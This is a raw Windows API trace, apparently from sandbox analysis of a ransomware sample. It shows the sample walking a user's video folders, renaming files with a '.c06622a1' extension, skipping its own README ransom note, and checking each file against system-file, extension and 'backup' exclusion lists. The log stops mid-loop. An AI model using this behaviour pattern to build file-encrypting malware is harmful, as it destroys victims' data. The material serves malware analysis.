[0156.874] wcscpy (in: _Dest=0x4560162, _Source="bq ithdPfB.mp4" | out: _Dest="bq ithdPfB.mp4") returned="bq ithdPfB.mp4" [0156.874] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\bq ithdPfB.mp4", dwFileAttributes=0x80) returned 1 [0156.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\bq ithdPfB.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7\\bq ithdpfb.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0156.874] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.874] ReadFile (in: hFile=0x644, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.875] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x448a2101 [0156.875] RtlComputeCrc32 (PartialCrc=0x2101, Buffer=0x3fe3f4, Length=0x80) returned 0x5c64abc6 [0156.875] RtlComputeCrc32 (PartialCrc=0xabc6, Buffer=0x3fe3f4, Length=0x80) returned 0xccd09261 [0156.875] RtlComputeCrc32 (PartialCrc=0x9261, Buffer=0x3fe3f4, Length=0x80) returned 0x44dc3f1b [0156.875] RtlComputeCrc32 (PartialCrc=0x3f1b, Buffer=0x3fe3f4, Length=0x80) returned 0xaac4c8a3 [0156.875] CloseHandle (hObject=0x644) returned 1 [0156.875] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.876] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\bq ithdPfB.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\bq ithdPfB.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\bq ithdPfB.mp4" [0156.876] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\bq ithdPfB.mp4") returned 0x5f [0156.876] wcscpy (in: _Dest=0x4570186, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.876] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\bq ithdPfB.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7\\bq ithdpfb.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\bq ithdPfB.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7\\bq ithdpfb.mp4.c06622a1"), dwFlags=0x8) returned 1 [0156.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\bq ithdPfB.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7\\bq ithdpfb.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x644 [0156.882] CreateIoCompletionPort (FileHandle=0x644, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.882] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2880020 [0156.887] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x70b758e9 [0156.887] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1071a098 [0156.887] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2858f690 [0156.887] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x101b6463 [0156.887] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d199d96 [0156.887] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4111764c [0156.887] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77831b09 [0156.887] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xdfce0be [0156.890] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2880094, Length=0x80) returned 0x45fc62e7 [0156.890] RtlComputeCrc32 (PartialCrc=0x62e7, Buffer=0x2880094, Length=0x80) returned 0x63aeda4d [0156.890] RtlComputeCrc32 (PartialCrc=0xda4d, Buffer=0x2880094, Length=0x80) returned 0x53211549 [0156.890] RtlComputeCrc32 (PartialCrc=0x1549, Buffer=0x2880094, Length=0x80) returned 0x54340ec6 [0156.890] RtlComputeCrc32 (PartialCrc=0xec6, Buffer=0x2880094, Length=0x80) returned 0x6e427987 [0156.890] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0156.890] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.890] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.890] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9ccc6c0, ftCreationTime.dwHighDateTime=0x1d5e3a4, ftLastAccessTime.dwLowDateTime=0x63e03850, ftLastAccessTime.dwHighDateTime=0x1d5d969, ftLastWriteTime.dwLowDateTime=0x63e03850, ftLastWriteTime.dwHighDateTime=0x1d5d969, nFileSizeHigh=0x0, nFileSizeLow=0xcfe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="hjqujcjPSTWT.swf", cAlternateFileName="HJQUJC~1.SWF")) returned 1 [0156.890] _wcsicmp (_Str1="hjqujcjPSTWT.swf", _Str2="README.c06622a1.TXT") returned -10 [0156.890] wcsstr (_Str="hjqujcjPSTWT.swf", _SubStr="README") returned 0x0 [0156.890] _wcsicmp (_Str1="autorun.inf", _Str2="hjqujcjPSTWT.swf") returned -7 [0156.890] wcslen (_String="autorun.inf") returned 0xb [0156.890] _wcsicmp (_Str1="boot.ini", _Str2="hjqujcjPSTWT.swf") returned -6 [0156.890] wcslen (_String="boot.ini") returned 0x8 [0156.890] _wcsicmp (_Str1="bootfont.bin", _Str2="hjqujcjPSTWT.swf") returned -6 [0156.890] wcslen (_String="bootfont.bin") returned 0xc [0156.891] _wcsicmp (_Str1="bootsect.bak", _Str2="hjqujcjPSTWT.swf") returned -6 [0156.891] wcslen (_String="bootsect.bak") returned 0xc [0156.891] _wcsicmp (_Str1="desktop.ini", _Str2="hjqujcjPSTWT.swf") returned -4 [0156.891] wcslen (_String="desktop.ini") returned 0xb [0156.891] _wcsicmp (_Str1="iconcache.db", _Str2="hjqujcjPSTWT.swf") returned 1 [0156.891] wcslen (_String="iconcache.db") returned 0xc [0156.891] _wcsicmp (_Str1="ntldr", _Str2="hjqujcjPSTWT.swf") returned 6 [0156.891] wcslen (_String="ntldr") returned 0x5 [0156.891] _wcsicmp (_Str1="ntuser.dat", _Str2="hjqujcjPSTWT.swf") returned 6 [0156.891] wcslen (_String="ntuser.dat") returned 0xa [0156.891] _wcsicmp (_Str1="ntuser.dat.log", _Str2="hjqujcjPSTWT.swf") returned 6 [0156.891] wcslen (_String="ntuser.dat.log") returned 0xe [0156.891] _wcsicmp (_Str1="ntuser.ini", _Str2="hjqujcjPSTWT.swf") returned 6 [0156.891] wcslen (_String="ntuser.ini") returned 0xa [0156.891] _wcsicmp (_Str1="thumbs.db", _Str2="hjqujcjPSTWT.swf") returned 12 [0156.891] wcslen (_String="thumbs.db") returned 0x9 [0156.891] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0156.891] wcslen (_String="386") returned 0x3 [0156.891] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0156.891] wcslen (_String="adv") returned 0x3 [0156.891] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0156.891] wcslen (_String="ani") returned 0x3 [0156.891] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0156.891] wcslen (_String="bat") returned 0x3 [0156.891] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0156.891] wcslen (_String="bin") returned 0x3 [0156.891] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0156.891] wcslen (_String="cab") returned 0x3 [0156.891] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0156.891] wcslen (_String="cmd") returned 0x3 [0156.891] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0156.891] wcslen (_String="com") returned 0x3 [0156.891] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0156.891] wcslen (_String="cpl") returned 0x3 [0156.891] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0156.891] wcslen (_String="cur") returned 0x3 [0156.891] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0156.891] wcslen (_String="deskthemepack") returned 0xd [0156.892] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0156.892] wcslen (_String="diagcab") returned 0x7 [0156.892] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0156.892] wcslen (_String="diagcfg") returned 0x7 [0156.892] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0156.892] wcslen (_String="diagpkg") returned 0x7 [0156.892] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0156.892] wcslen (_String="dll") returned 0x3 [0156.892] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0156.892] wcslen (_String="drv") returned 0x3 [0156.892] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0156.892] wcslen (_String="exe") returned 0x3 [0156.892] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0156.892] wcslen (_String="hlp") returned 0x3 [0156.892] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0156.892] wcslen (_String="icl") returned 0x3 [0156.892] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0156.892] wcslen (_String="icns") returned 0x4 [0156.892] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0156.892] wcslen (_String="ico") returned 0x3 [0156.892] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0156.892] wcslen (_String="ics") returned 0x3 [0156.892] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0156.892] wcslen (_String="idx") returned 0x3 [0156.892] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0156.892] wcslen (_String="ldf") returned 0x3 [0156.892] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0156.892] wcslen (_String="lnk") returned 0x3 [0156.892] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0156.892] wcslen (_String="mod") returned 0x3 [0156.892] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0156.892] wcslen (_String="mpa") returned 0x3 [0156.892] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0156.892] wcslen (_String="msc") returned 0x3 [0156.892] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0156.892] wcslen (_String="msp") returned 0x3 [0156.892] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0156.893] wcslen (_String="msstyles") returned 0x8 [0156.893] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0156.893] wcslen (_String="msu") returned 0x3 [0156.893] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0156.893] wcslen (_String="nls") returned 0x3 [0156.893] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0156.893] wcslen (_String="nomedia") returned 0x7 [0156.893] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0156.893] wcslen (_String="ocx") returned 0x3 [0156.893] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0156.893] wcslen (_String="prf") returned 0x3 [0156.893] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0156.893] wcslen (_String="ps1") returned 0x3 [0156.893] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0156.893] wcslen (_String="rom") returned 0x3 [0156.893] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0156.893] wcslen (_String="rtp") returned 0x3 [0156.893] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0156.893] wcslen (_String="scr") returned 0x3 [0156.893] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0156.893] wcslen (_String="shs") returned 0x3 [0156.893] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0156.893] wcslen (_String="spl") returned 0x3 [0156.893] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0156.893] wcslen (_String="sys") returned 0x3 [0156.893] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0156.893] wcslen (_String="theme") returned 0x5 [0156.893] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0156.893] wcslen (_String="themepack") returned 0x9 [0156.893] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0156.893] wcslen (_String="wpx") returned 0x3 [0156.893] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0156.893] wcslen (_String="lock") returned 0x4 [0156.893] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0156.893] wcslen (_String="key") returned 0x3 [0156.893] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0156.893] wcslen (_String="hta") returned 0x3 [0156.893] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0156.894] wcslen (_String="msi") returned 0x3 [0156.894] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0156.894] wcslen (_String="pdb") returned 0x3 [0156.894] _wcsicmp (_Str1="sql", _Str2="swf") returned -6 [0156.894] wcslen (_String="sql") returned 0x3 [0156.894] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0156.894] wcslen (_String="sqlite") returned 0x6 [0156.894] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7")) returned 0x10 [0156.894] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.894] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7" [0156.894] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7") returned 0x50 [0156.894] wcscpy (in: _Dest=0x4560162, _Source="hjqujcjPSTWT.swf" | out: _Dest="hjqujcjPSTWT.swf") returned="hjqujcjPSTWT.swf" [0156.894] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\hjqujcjPSTWT.swf", dwFileAttributes=0x80) returned 1 [0156.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\hjqujcjPSTWT.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7\\hjqujcjpstwt.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0156.894] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.894] ReadFile (in: hFile=0x640, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.895] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x50f201ac [0156.895] RtlComputeCrc32 (PartialCrc=0x1ac, Buffer=0x3fe3f4, Length=0x80) returned 0x6310d409 [0156.895] RtlComputeCrc32 (PartialCrc=0xd409, Buffer=0x3fe3f4, Length=0x80) returned 0x65e95ba5 [0156.895] RtlComputeCrc32 (PartialCrc=0x5ba5, Buffer=0x3fe3f4, Length=0x80) returned 0xa589823b [0156.895] RtlComputeCrc32 (PartialCrc=0x823b, Buffer=0x3fe3f4, Length=0x80) returned 0x603e5372 [0156.895] CloseHandle (hObject=0x640) returned 1 [0156.895] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.895] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\hjqujcjPSTWT.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\hjqujcjPSTWT.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\hjqujcjPSTWT.swf" [0156.895] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\hjqujcjPSTWT.swf") returned 0x61 [0156.895] wcscpy (in: _Dest=0x457018a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.895] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\hjqujcjPSTWT.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7\\hjqujcjpstwt.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\hjqujcjPSTWT.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7\\hjqujcjpstwt.swf.c06622a1"), dwFlags=0x8) returned 1 [0156.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\hjqujcjPSTWT.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7\\hjqujcjpstwt.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x640 [0156.898] CreateIoCompletionPort (FileHandle=0x640, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.898] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2910020 [0156.903] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x46d00b50 [0156.903] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5f254ba6 [0156.903] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4fed0a72 [0156.903] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2b7ffd85 [0156.903] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xdb21d2 [0156.903] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x12d24f4b [0156.903] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x30822bb [0156.903] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7dfcf06d [0156.907] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2910094, Length=0x80) returned 0xb560d000 [0156.907] RtlComputeCrc32 (PartialCrc=0xd000, Buffer=0x2910094, Length=0x80) returned 0xbc81e3b6 [0156.907] RtlComputeCrc32 (PartialCrc=0xe3b6, Buffer=0x2910094, Length=0x80) returned 0x4a58146f [0156.907] RtlComputeCrc32 (PartialCrc=0x146f, Buffer=0x2910094, Length=0x80) returned 0xd0a32ca4 [0156.907] RtlComputeCrc32 (PartialCrc=0x2ca4, Buffer=0x2910094, Length=0x80) returned 0x7335d0a2 [0156.907] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0156.907] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.907] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.907] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc13a300, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdc13a300, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdc1d2880, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.907] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.907] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.907] FindClose (in: hFindFile=0x2db8800 | out: hFindFile=0x2db8800) returned 1 [0156.907] _wcsicmp (_Str1="backup", _Str2="YJ8O1oZ4VFaX7") returned -23 [0156.907] wcslen (_String="backup") returned 0x6 [0156.907] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.907] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.907] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.907] FindClose (in: hFindFile=0x2db87c0 | out: hFindFile=0x2db87c0) returned 1 [0156.907] _wcsicmp (_Str1="backup", _Str2="e6Wwn") returned -3 [0156.907] wcslen (_String="backup") returned 0x6 [0156.907] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0156.908] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0156.909] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf534fdd0, ftCreationTime.dwHighDateTime=0x1d5e266, ftLastAccessTime.dwLowDateTime=0x541d8000, ftLastAccessTime.dwHighDateTime=0x1d5da61, ftLastWriteTime.dwLowDateTime=0x541d8000, ftLastWriteTime.dwHighDateTime=0x1d5da61, nFileSizeHigh=0x0, nFileSizeLow=0x17660, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qga9EluiUyFQ9xR.avi", cAlternateFileName="QGA9EL~1.AVI")) returned 1 [0156.909] _wcsicmp (_Str1="Qga9EluiUyFQ9xR.avi", _Str2="README.c06622a1.TXT") returned -1 [0156.909] wcsstr (_Str="Qga9EluiUyFQ9xR.avi", _SubStr="README") returned 0x0 [0156.909] _wcsicmp (_Str1="autorun.inf", _Str2="Qga9EluiUyFQ9xR.avi") returned -16 [0156.909] wcslen (_String="autorun.inf") returned 0xb [0156.909] _wcsicmp (_Str1="boot.ini", _Str2="Qga9EluiUyFQ9xR.avi") returned -15 [0156.909] wcslen (_String="boot.ini") returned 0x8 [0156.909] _wcsicmp (_Str1="bootfont.bin", _Str2="Qga9EluiUyFQ9xR.avi") returned -15 [0156.909] wcslen (_String="bootfont.bin") returned 0xc [0156.909] _wcsicmp (_Str1="bootsect.bak", _Str2="Qga9EluiUyFQ9xR.avi") returned -15 [0156.909] wcslen (_String="bootsect.bak") returned 0xc [0156.909] _wcsicmp (_Str1="desktop.ini", _Str2="Qga9EluiUyFQ9xR.avi") returned -13 [0156.909] wcslen (_String="desktop.ini") returned 0xb [0156.909] _wcsicmp (_Str1="iconcache.db", _Str2="Qga9EluiUyFQ9xR.avi") returned -8 [0156.909] wcslen (_String="iconcache.db") returned 0xc [0156.909] _wcsicmp (_Str1="ntldr", _Str2="Qga9EluiUyFQ9xR.avi") returned -3 [0156.909] wcslen (_String="ntldr") returned 0x5 [0156.909] _wcsicmp (_Str1="ntuser.dat", _Str2="Qga9EluiUyFQ9xR.avi") returned -3 [0156.909] wcslen (_String="ntuser.dat") returned 0xa [0156.909] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Qga9EluiUyFQ9xR.avi") returned -3 [0156.909] wcslen (_String="ntuser.dat.log") returned 0xe [0156.909] _wcsicmp (_Str1="ntuser.ini", _Str2="Qga9EluiUyFQ9xR.avi") returned -3 [0156.909] wcslen (_String="ntuser.ini") returned 0xa [0156.909] _wcsicmp (_Str1="thumbs.db", _Str2="Qga9EluiUyFQ9xR.avi") returned 3 [0156.910] wcslen (_String="thumbs.db") returned 0x9 [0156.910] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0156.910] wcslen (_String="386") returned 0x3 [0156.910] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0156.910] wcslen (_String="adv") returned 0x3 [0156.910] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0156.910] wcslen (_String="ani") returned 0x3 [0156.910] _wcsicmp (_Str1="bat", 